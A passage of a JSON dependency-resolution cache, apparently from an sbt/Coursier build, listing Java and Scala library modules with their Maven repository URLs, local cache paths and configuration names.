n/jsr250-api/1.0/jsr250-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://jcp.org/aboutJava/communityprocess/final/jsr250/index.html\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-analysis\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-analysis\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.enterprise\",\"name\":\"cdi-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"cdi-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-model\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-model\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-commons\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-commons\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant-launcher\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant-launcher\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-tree\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-tree\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.inject\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.inject\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.plexus\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.plexus\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.pantsbuild\",\"name\":\"jarjar\",\"revision\":\"1.7.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jarjar\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/pantsbuild/jarjar\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-component-annotations\",\"revision\":\"1.5.5\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-component-annotations\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-classworlds\",\"revision\":\"2.5.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-classworlds\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scalactic\",\"name\":\"scalactic_2.12\",\"revision\":\"3.0.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalactic_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scalatest.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-utils\",\"revision\":\"3.0.22\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-utils\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://plexus.codehaus.org/plexus-utils\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sbt-assembly\",\"revision\":\"0.14.10\",\"configurations\":\"compile\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt-assembly\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\"]],\"missingArtifacts\":[],\"publicationDate\":\"2019-08-06T10:52:23+08:00\",\"evicted\":false,\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"configurations\":[{\"name\":\"pom\"},{\"name\":\"test\"},{\"name\":\"provided\"},{\"name\":\"docs\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"sources\"},{\"name\":\"runtime\"}],\"licenses\":[[\"MIT License\",\"https://github.com/sbt/sbt-assembly/blob/master/LICENSE\"]],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"test-internal\"},\"modules\":[{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"test-interface\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"test-interface\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/test-interface/1.0/test-interface-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-sbt.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.typesafe\",\"name\":\"ssl-config-core_2.12\",\"revision\":\"0.4.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ssl-config-core_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/typesafe/ssl-config-core_2.12/0.4.0/ssl-config-core_2.12-0.4.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/lightbend/ssl-config\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"io_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"io_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/io_2.12/1.3.3/io_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/io\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"main_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"main_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/main_2.12/1.3.8/main_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.trueaccord.lenses\",\"name\":\"lenses_2.12\",\"revision\":\"0.4.12\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"lenses_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/trueaccord/lenses/lenses_2.12/0.4.12/lenses_2.12-0.4.12.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/trueaccord/lenses\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"command_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"command_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/command_2.12/1.3.8/command_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.github.ben-manes.caffeine\",\"name\":\"caffeine\",\"revision\":\"2.5.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"caffeine\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/github/ben-manes/caffeine/caffeine/2.5.6/caffeine-2.5.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/ben-manes/caffeine\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"task-system_2.12\",\"revision\":\"1.3.8\",\"configurations\"